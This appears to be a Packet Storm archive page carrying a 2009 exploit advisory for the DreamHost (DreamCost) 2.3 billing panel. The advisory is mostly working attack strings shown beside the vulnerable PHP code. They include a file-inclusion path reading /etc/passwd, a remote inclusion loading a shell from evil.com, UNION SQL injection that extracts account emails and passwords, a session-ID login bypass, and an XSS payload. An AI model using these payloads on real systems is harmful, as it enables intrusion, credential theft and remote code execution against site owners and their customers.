exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DreamHost 2.3 SQL Injection / RFI / LFI / XSS

DreamHost 2.3 SQL Injection / RFI / LFI / XSS
Posted Aug 28, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

DreamHost versions 2.3 and below suffer from remote SQL injection, remote file inclusion, local file inclusion, and cross site scripting vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion
SHA-256 | 63b5564c74ab83334a7ccb85839493eb9482fe5028407714c3457fd47b5cc7de

DreamHost 2.3 SQL Injection / RFI / LFI / XSS

Change Mirror Download
=================================================
DreamHost <= && > 2.3 global inj3ct0r.com Exploit
=================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3

----------------------------------------------------------------

Local Include Exploit:

/members.php?page=/../../../../../../../../../../etc/passwd%00


Vulnerable code:

// member_template.html
<?
include("member_$page.html");
?>

-----------------------------------------------------------------

Remote Include Exploit:

/admin/?page=http://evil.com/shell.php?

Vulnerable code:

// /admin/template.html
include("$page$page_ext");

------------------------------------------------------------------

Sql Inj3ct0r Exploit:


members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id

and

members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20

Vulnerable code:

// member_orders_view.html
$db = new ps_DB;
$q = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id";

-------------------------------------------------------------

Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path

Vulnerable code:

// member_static.thml
<? echo setup($content);?>

// functions.php
function setup($field) {
$db = new ps_DB;
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";
$db->query($q);
$db->next_record();

$ret = $db->f("setup_$field");
return $ret;
}
$db->query($q);

-------------------------------------------------------------

SQL-Inj3ct0r entry under randomly Account

members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20

Vulnerable code:


// member_account.html
$pass = is_logged($session_id);

// functions.php
function is_logged($session_id) {
$db = new ps_DB;
$q = "SELECT * FROM login WHERE login_id = '$session_id'";
$db->query($q);
$db->next_record();
$ret = $db->f("login_logged");
return $ret;
}

--------------------------------------------------------------

Xss Exploit:

/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>


---------------------------------

ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~ - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close